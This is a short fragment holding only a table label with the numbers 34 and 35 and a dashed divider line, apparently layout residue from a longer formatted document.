TABLE 34 | 35 | --------------------------------------------------------------------------------